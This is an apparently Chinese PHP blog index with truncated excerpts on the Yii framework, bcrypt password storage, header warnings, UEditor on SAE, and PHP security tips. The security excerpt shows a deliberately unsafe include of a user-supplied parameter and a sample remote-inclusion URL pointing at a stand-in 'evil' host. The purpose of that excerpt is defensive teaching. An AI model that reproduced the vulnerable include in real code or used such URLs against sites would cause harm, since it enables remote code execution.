-
Yii框架快速入门[使用AMP环境搭建Yii]2013.06.14
下载Yii源程序解压后,会有demos、framework、requirements三个文件夹。
demos是官方提供的几个项目实例,requirements是用来检查自身运行环境。我们只需要framework、requirements两个文件夹即可。
生成Yii的框架程序
官方提供的是yiic.bat(win下)、yiic(Linux下)两个自动化生成工具,在framework文件夹下,非常的方便。
Windows环境下使用yiic.bat生
-
PHP最佳编程实践(英译)2013.06.10
这篇文章是尝试将一系列基本的PHP知识点起来,这些可以被认为是PHP中处理普遍的令人困惑的难题时的最佳实践。也是对PHP编程涉及技术的最优指引。英译原文《PHP Best Practices-A short, practical guide for common and confusing PHP tasks》
存储密码
作者认为使用md5或者sha1加密用户密码是不安全的,因为黑客能够很容易的破解。
最安全的方式是使用bcrypt算法加密。
-
Yii框架快速入门[Yii简介及运行原理]2013.06.06
Yii是一个基于组件、用于开发大型 Web 应用的 高性能 PHP 框架。采用严格的 OOP 编写,Yii 使用简单,非常灵活,具有很好的可扩展性。Yii官方下载
包含特性
1. MVC、DAO/ActiveRecord、I18N/L10N、caching
2. 基于 JQuery 的 AJAX 支持、用户认证和基于角色的访问控制
3. 脚手架、输入验证、部件、事件、主题化以及 Web 服务等等
在我们的程序开发中,为了缩短开发时间,也经常使用Y
-
1
Warning: Cannot modify header information - headers already sent by
此警告的产生原因是:调用header函数之前文件已有输出,例如:
123echo
' '
;
header(
"Content-type:text/html; charset=utf-8"
);
echo
'This is a Test'
;
在调用header设置编码之
-
SAE中级开发者申请[经验分享]2013.05.13
-
PHP编程安全的五点建议2013.04.26
1、动态加载问题
1234$action
=
'login'
;
if
(__isset(
$_GET
[
'act'
] ) )
$action
=
$_GET
[
'act'
];
require
(
$action
.
'.php'
);
这个代码相当危险,攻击者有可能可以干这些事:
/test.php?act=http://evil/exploit - 注入远程机器上有漏洞的
-
SAE平台整合UEditor2013.04.21
UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于BSD协议,允许自由使用和修改代码,功能丰富,使用起来也比较方便。大部分代码为前端代码,所以整合到SAE平台,只需要修改附件、图片上传处理的PHP处理脚本。这里选用的是UEditor最新ueditor1_2_5_1-utf8-php版本。
打开php/fileUp.php文件,此文件为文件上传处理文件,将里边代码全部注释,